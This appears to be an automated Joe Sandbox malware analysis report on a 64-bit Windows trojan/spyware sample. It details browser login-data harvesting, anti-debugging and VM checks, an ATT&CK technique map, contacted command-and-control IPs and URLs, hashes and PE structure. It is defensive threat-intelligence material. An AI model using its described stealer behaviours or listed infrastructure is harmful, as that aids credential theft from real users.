Source: O16AWEA5iQ.exe, 00000000.00000002.4569856934.000001C0001E2000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: GenuineTMx86GenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosof"Microsoft HvMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Code function: 0_2_000002EBF9BF1A40 Start: 000002EBF9BF1A49 End: 000002EBF9BF1A5F

0_2_000002EBF9BF1A40

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe

Code function: 0_2_000002EBF9BF1A40 rdtscp

0_2_000002EBF9BF1A40

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browser_data1097302165 VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\browser_data2454273873 VolumeInformation			Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	File opened: C:\Users\Default User\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	File opened: C:\Users\desktop.ini\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\O16AWEA5iQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	3 Obfuscated Files or Information	11 Input Capture	11 System Information Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	Query Registry	SMB/Windows Admin Shares	1 Data from Local System	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
O16AWEA5iQ.exe	3%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.61xdm.com/wmob	0%	Avira URL Cloud	safe
https://www.i5iii.com/insertGetSecurityDescriptorControlInitializeSecurityDescriptorSetSecurityDescr	0%	Avira URL Cloud	safe
https://www.61xdm.com/wmobbad	0%	Avira URL Cloud	safe
http://107.148.62.100:8084/	0%	Avira URL Cloud	safe
http://107.148.62.100:8084/?a=w64&h=107.148.62.100&t=ws_&p=8084	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
61xdm.com	107.148.51.200	true	false		unknown
www.61xdm.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://107.148.62.100:8084/?a=w64&h=107.148.62.100&t=ws_&p=8084	false	Avira URL Cloud: safe	unknown
http://107.148.62.100:8084/	false	Avira URL Cloud: safe	unknown
https://www.61xdm.com/wmob	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://beego.me/docs/module/toolbox.md	O16AWEA5iQ.exe, 00000000.00000002.4569856934.000001C000104000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.61xdm.com/wmobbad	O16AWEA5iQ.exe	false	Avira URL Cloud: safe	unknown
http://beego.me/docs/advantage/monitor.md	O16AWEA5iQ.exe, 00000000.00000002.4569856934.000001C000104000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.i5iii.com/insertGetSecurityDescriptorControlInitializeSecurityDescriptorSetSecurityDescr	O16AWEA5iQ.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
107.148.62.100	unknown	United States		54600	PEGTECHINCUS	false
107.148.51.200	61xdm.com	United States		54600	PEGTECHINCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577436
Start date and time:	2024-12-18 13:30:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	O16AWEA5iQ.exe renamed because original name is a hash value
Original Sample Name:	e704ea2f17b1c9b22182eb203c757ba91e262983d7021f4c644b99cd98f0b0ce.exe
Detection:	MAL
Classification:	mal64.troj.spyw.evad.winEXE@1/5@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 2 Number of non-executed functions: 57
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing network information.
VT rate limit hit for: O16AWEA5iQ.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
107.148.62.100	T2dvU8f2xg.exe	Get hash	malicious	Unknown	Browse	107.148.62.100:8084/
	7nJ9Jo78Vq.dll	Get hash	malicious	Unknown	Browse	107.148.62.100:8084/
	3zhEXB7iUp.dll	Get hash	malicious	Unknown	Browse	107.148.62.100:8084/
	i4VmSW2D4u.dll	Get hash	malicious	Unknown	Browse	107.148.62.100:8084/
107.148.51.200	T2dvU8f2xg.exe	Get hash	malicious	Unknown	Browse
	7nJ9Jo78Vq.dll	Get hash	malicious	Unknown	Browse
	3zhEXB7iUp.dll	Get hash	malicious	Unknown	Browse
	i4VmSW2D4u.dll	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PEGTECHINCUS	T2dvU8f2xg.exe	Get hash	malicious	Unknown	Browse	107.148.51.200
	7nJ9Jo78Vq.dll	Get hash	malicious	Unknown	Browse	107.148.51.200
	3zhEXB7iUp.dll	Get hash	malicious	Unknown	Browse	107.148.51.200
	SGVKcFqU08.exe	Get hash	malicious	Unknown	Browse	107.148.62.100
	i4VmSW2D4u.dll	Get hash	malicious	Unknown	Browse	107.148.51.200
	ldr.ps1	Get hash	malicious	GO Miner, Xmrig	Browse	156.239.140.243
	elitebotnet.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	108.186.11.63
	b3astmode.sh4.elf	Get hash	malicious	Mirai	Browse	156.247.76.135
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	198.2.236.225
	sh4.elf	Get hash	malicious	Mirai	Browse	156.243.156.245
PEGTECHINCUS	T2dvU8f2xg.exe	Get hash	malicious	Unknown	Browse	107.148.51.200
	7nJ9Jo78Vq.dll	Get hash	malicious	Unknown	Browse	107.148.51.200
	3zhEXB7iUp.dll	Get hash	malicious	Unknown	Browse	107.148.51.200
	SGVKcFqU08.exe	Get hash	malicious	Unknown	Browse	107.148.62.100
	i4VmSW2D4u.dll	Get hash	malicious	Unknown	Browse	107.148.51.200
	ldr.ps1	Get hash	malicious	GO Miner, Xmrig	Browse	156.239.140.243
	elitebotnet.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	108.186.11.63
	b3astmode.sh4.elf	Get hash	malicious	Mirai	Browse	156.247.76.135
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	198.2.236.225
	sh4.elf	Get hash	malicious	Mirai	Browse	156.243.156.245

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\browser_data1097302165\Local State

Download File

Process:	C:\Users\user\Desktop\O16AWEA5iQ.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	601365
Entropy (8bit):	6.008791134195978
Encrypted:	false
SSDEEP:	12288:l11e8OdHB+LeuC6MeAOXw6VwIHDIu62IPXjHf:lTenHw1C6MqgIDjyPT/
MD5:	174BC06D568819E002A136E848701847
SHA1:	DECE64C7FC14E7F0D9EF0ACFEF61D2E251242E85
SHA-256:	0BD2C19EA8665923BD8DD8D3992BBB2DB9B958B46CAACAD84DC5E03C258C7EB1
SHA-512:	17F4EAEC278BD8A8FB23FEA92D7F698379132F46CA2C6A97003EA30A4E27F411BDD9A26FDA585499208EFEA25D6C23375EB9857EC5B699D84CE934F91F7B9A9B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"browser":{"first_run_finished":true,"first_run_study_group":"EnabledE-5","shortcut_migration_version":"117.0.5938.132"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.696426810068423e+12,"network":1.69642681e+12,"ticks":423833625.0,"uncertainty":2034246.0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAABcByHmkJWMthaaF6PAj44r6G5q8HbZMYQ78KiV7ktVmQAAAAAOgAAAAAIAACAAAAA7QovYWUH9jKwer+mATh0d48meKRQtltSX16XxxPWWA2ABAAC4ore7HQTXddwLyE2jwNV/4ftVW9+MWocSg5WPR1FRhkd6090OQ8PyZLBU3Rc+zrrowkC6sKrTpTldlSWYMhzsNLXud9KDCMJbKu4celgfQ0Xli7lHCLEZtJdZB7XRZLdPzIA7yCELaNh0Tzk8tAn7OkKs/GwqTXg/0IRrDQwRjtlhpS2MXt4c7Nip//L0neEWgM2K6pW7nC6hZt+1PTTJQd1HLQI25gileFmmT7iZTmDbfhwI65gCxAbSmasdgEWMsLDPxtgVj1AgzCFIDTXul8NsIYjviDd1l7pez16jtmwELJT2bRUZ0

C:\Users\user\AppData\Local\Temp\browser_data1097302165\Login Data

Download File

Process:	C:\Users\user\Desktop\O16AWEA5iQ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\browser_data2454273873\Local State

Download File

Process:	C:\Users\user\Desktop\O16AWEA5iQ.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0906888050947225
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMEcwuF9hDO6vP6O9Htbzy70FqHoPFkGoup1Xl3jC:z/Ps+wsI7ynEd6Jtbz8hu3VlXr4CRoX
MD5:	6F8FFE68CBDE7984212AC28FB4502998
SHA1:	04A8B89447F7AFBC4ADF55A3CCEDF082FA58FF84
SHA-256:	871374A34C6A3799519FCCF50B91C3DFF7F543710B2F7EEF5003618E84032C31
SHA-512:	72834E16907E2B0E3637F7A969978E06E52CC660754F3E734585B5D3FDCBD02F99076757C572C595FA322E99C286A66ED95ABAEA791F98A9FA77E815052CF85A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Temp\browser_data2454273873\Login Data

Download File

Process:	C:\Users\user\Desktop\O16AWEA5iQ.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Mup\user-PC\PIPE\samr

Download File

Process:	C:\Users\user\Desktop\O16AWEA5iQ.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	5.856766975968726
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	O16AWEA5iQ.exe
File size:	22'996'756 bytes
MD5:	54a911b3e8161444ea6677c23aa38d17
SHA1:	7c9776b4517cc6c45a3f2f98ba53b3859724eae6
SHA256:	e704ea2f17b1c9b22182eb203c757ba91e262983d7021f4c644b99cd98f0b0ce
SHA512:	ea1e169080ab2de01fb38c89d401d130fb5ff5320f7d3dce8c6c05486c9f2fee693cdd0773272613eee7bda01ea2aae5f9336b11a804755518ca578bb6022ab1
SSDEEP:	196608:AwmXQnqEcIM3T36dHAIfaKHNSlDECQxx82:8QnGIMj4ff7qDEVxx82
TLSH:	85374947FA9449EAC655913989AB43C63770FC001F2BA7D72A08B33C7CB66D9AE74350
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........VT..>....&....*.H@.."y................@.............................@Z......K_...`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1400010f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x40403270, 0x1, 0x40403330, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	2a6387cd8cecadfdafd2d63b1e386f9f

Entrypoint Preview

Instruction
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 30h
mov dword ptr [ebp-04h], 000000FFh
dec eax
mov eax, dword ptr [00761A63h]
mov dword ptr [eax], 00000001h
call 00007FCA1080B602h
mov dword ptr [ebp-04h], eax
nop
nop
mov eax, dword ptr [ebp-04h]
dec eax
add esp, 30h
pop ebp
ret
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 30h
mov dword ptr [ebp-04h], 000000FFh
dec eax
mov eax, dword ptr [00761A34h]
mov dword ptr [eax], 00000000h
call 00007FCA1080B5D3h
mov dword ptr [ebp-04h], eax
nop
nop
mov eax, dword ptr [ebp-04h]
dec eax
add esp, 30h
pop ebp
ret
push ebp
dec eax
mov ebp, esp
dec eax
sub esp, 70h
dec eax
mov dword ptr [ebp-10h], 00000000h
mov dword ptr [ebp-1Ch], 00000030h
mov eax, dword ptr [ebp-1Ch]
dec eax
mov eax, dword ptr [eax]
dec eax
mov dword ptr [ebp-28h], eax
dec eax
mov eax, dword ptr [ebp-28h]
dec eax
mov eax, dword ptr [eax+08h]
dec eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-04h], 00000000h
jmp 00007FCA1080B5E3h
dec eax
mov eax, dword ptr [ebp-10h]
dec eax
cmp eax, dword ptr [ebp-18h]
jne 00007FCA1080B5CBh
mov dword ptr [ebp-04h], 00000001h
jmp 00007FCA1080B607h
mov ecx, 000003E8h
dec eax
mov eax, dword ptr [007D76B5h]
call eax
dec eax
mov eax, dword ptr [00761A0Ch]
dec eax
mov dword ptr [ebp-30h], eax
dec eax
mov eax, dword ptr [ebp-18h]
dec eax
mov dword ptr [ebp+00h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7d7000	0x159	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7d8000	0x181c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x766000	0x17514	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7dc000	0xedfc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x7627a0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7d8570	0x530	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x404770	0x404800	14d884f73af842f49c7e4a830f097c4a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x406000	0x448b0	0x44a00	82ff6d1775714a9b22703737615ef723	False	0.3544370446265938	data	4.670900937861022	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x44b000	0x3199a0	0x319a00	4a26c6babbc69b80cda6cc26e5229049	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
/4	0x765000	0x4	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x766000	0x17514	0x17600	05dc2fb0e5312b808d8339c200937adc	False	0.4364973262032086	data	5.8379355625722305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x77e000	0x6fb4	0x7000	9e4cec080fcdf386a87401d244b8be9d	False	0.16183035714285715	shared library	4.60242073653297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x785000	0x51060	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x7d7000	0x159	0x200	6cfcbd524a1a3a57bbfd4196be52e0eb	False	0.416015625	data	3.6962804899380206	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x7d8000	0x181c	0x1a00	94b4c8641a33dc1f812871e69440c8c5	False	0.2902644230769231	data	4.386913745745937	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x7da000	0x60	0x200	43e67062516e6f9d313aadd741977626	False	0.0703125	data	0.3164000245953951	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x7db000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x7dc000	0xedfc	0xee00	f1c3a6a4ee4814a07166c6c2078256ec	False	0.2524783350840336	data	5.441126036939453	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/14	0x7eb000	0x400	0x400	a4f46c9d92dffec4994c21118d440d43	False	0.2705078125	data	2.090299117426787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/29	0x7ec000	0x4b0946	0x4b0a00	f0477cde44adab569950eb22685bc333	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/41	0xc9d000	0x2a27	0x2c00	7f063bfd306028b5dba0a8f3b5b4b768	False	0.28764204545454547	data	4.927925384513165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/55	0xca0000	0x208b18	0x208c00	fa0c7687ecee34cfafd1fc6b3996371f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/67	0xea9000	0x7a0a8	0x7a200	f4bfaf4a30c0059fe6e2ba4fc3f8dfd8	False	0.2444025076765609	data	4.664350884650003	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/80	0xf24000	0x2a49	0x2c00	52c24b76c43df5daa4cc70ab36390635	False	0.46351207386363635	data	4.877410374559604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/91	0xf27000	0x3b43e4	0x3b4400	b196368bbb7a861a17c46ef8b11e101a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/102	0x12dc000	0x118e10	0x119000	18b001b9e1a749ce89502760c63968c4	False	0.15862711298932383	GTA audio index data (SDT)	2.371198687772322	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/116	0x13f5000	0x40	0x200	bdeec07d20de40188f46d6ead44cbbb5	False	0.134765625	data	1.0888828096821108	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/135	0x13f6000	0x1132	0x1200	7da032071e18f9986eeaa57967e2f9f5	False	0.1840277777777778	data	4.968735035173031	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/151	0x13f8000	0x178807	0x178a00	829d315a80194c9c88f0f11d0970850a	False	0.42490808060902757	data	5.448783655771378	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/167	0x1571000	0x32682	0x32800	41d013e0bd13408019fea6c8b8b6728f	False	0.5088229037747525	data	5.513840971394825	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

